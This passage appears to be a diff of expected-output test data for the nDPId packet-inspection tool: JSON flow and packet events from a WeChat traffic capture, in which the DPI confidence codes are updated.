00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1492167765155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765155,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8EUFAAEARpLrAqAFnwKgB\/uvEADUAKLhvU\/MBAAABAAAAAAAAA3dlYgZ3ZWNoYXQDY29tAAABAAE="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1492167765432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":391,"pkt_l4_len":357,"thread_ts_msec":1492167765432,"pkt":"eJKcD6iO8IQvSpdgCABFoAF5AABAAEARtB7AqAH+wKgBZwA168QBZQj\/U\/OBgAABAAMABAALA3dlYgZ3ZWNoYXQDY29tAAABAAHADAAFAAEAAAJYAAcEd2ViMcAQwCwAAQABAAACWAAEy82Tq8AsAAEAAQAAAlgABMvNl6LALAACAAEAAU8CAA0HbnMtdGVsMQJxccAXwCwAAgABAAFPAgAKB25zLWNuYzHAZ8AsAAIAAQABTwIACQZucy1vczHAZ8AsAAIAAQABTwIACgducy1jbW4xwGfAjgABAAEAAAFuAAS4ac55wI4AAQABAAABbgAEy82TmMCOAAEAAQAAAW4ABMvNsDrAjgABAAEAAAFuAARnBx7vwKMAAQABAAANPgAEtv5vZMCjAAEAAQAADT4ABLfoeDvAowABAAEAAA0+AAS2\/hBmwHgAAQABAAABmAAEb6Frw8B4AAEAAQAAAZgABG+haBHAXwABAAEAAAFuAAS2jLiMwF8AAQABAAABbgAEtwK6mQ=="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1492167765432,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.147.171"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1492167765432,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.147.171"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765433,"flow_last_seen":1492167765433,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765433,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1492167765433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765433,"pkt":"8IQvSpdgeJKcD6iOCABFAAA88RZAAEAGKB3AqAFny82Tq+K0AbvYTb2iAAAAAKACchDtIAAAAgQFtAQCCAoAMky0AAAAAAEDAwc="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765657,"flow_last_seen":1492167765657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765657,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1492167765657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765657,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8ZwNAAEAGsjDAqAFny82Tq+K1Abs3CyvvAAAAAKACchAf3gAAAgQFtAQCCAoAMkzsAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1492167765701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765701,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rSlk19z2E29o6ASN8g4AQAAAgQFoAQCCApF8qRxADJMtAEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1492167765701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765701,"pkt":"8IQvSpdgeJKcD6iOCABFAAA08RdAAEAGKCTAqAFny82Tq+K0AbvYTb2jpZNfdIAQAOWdWQAAAQEICgAyTPdF8qRx"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167765433,"flow_last_seen":1492167765701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167765701,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167765433,"flow_last_seen":1492167765701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167765701,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1492167765933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765933,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rU+QocNNwsr8KASN8h9cwAAAgQFoAQCCApFrtG3ADJM7AEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1492167765933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765933,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZwRAAEAGsjfAqAFny82Tq+K1Abs3CyvwPkKHDoAQAOXiyQAAAQEICgAyTTFFrtG3"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167617248,"flow_last_seen":1492167640200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167617248,"flow_last_seen":1492167640200,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167776953,"flow_last_seen":1492167776953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167776953,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -356,41 +354,41 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1492167777204,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777204,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XvpAAEAGujnAqAFny82Tq+K3Abv08QbJAAAAAKACchB71AAAAgQFtAQCCAoAMlgzAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1492167777220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777220,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rYX2Lh9mWvEIqASN8j8PgAAAgQFoAQCCApF00IlADJX9AEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1492167777220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777220,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0k9ZAAEAGhWXAqAFny82Tq+K2AbuZa8QiF9i4foAQAOVhlwAAAQEICgAyWDdF00Il"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1264,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167776953,"flow_last_seen":1492167777221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167777221,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1264,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167776953,"flow_last_seen":1492167777221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167777221,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1492167777476,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777476,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74reza+A99PEGyqASN8j\/yAAAAgQFoAQCCApFrtz+ADJYMwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1492167777476,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777476,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XvtAAEAGukDAqAFny82Tq+K3Abv08QbKs2vgPoAQAOVlIAAAAQEICgAyWHdFrtz+"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1268,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1270,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 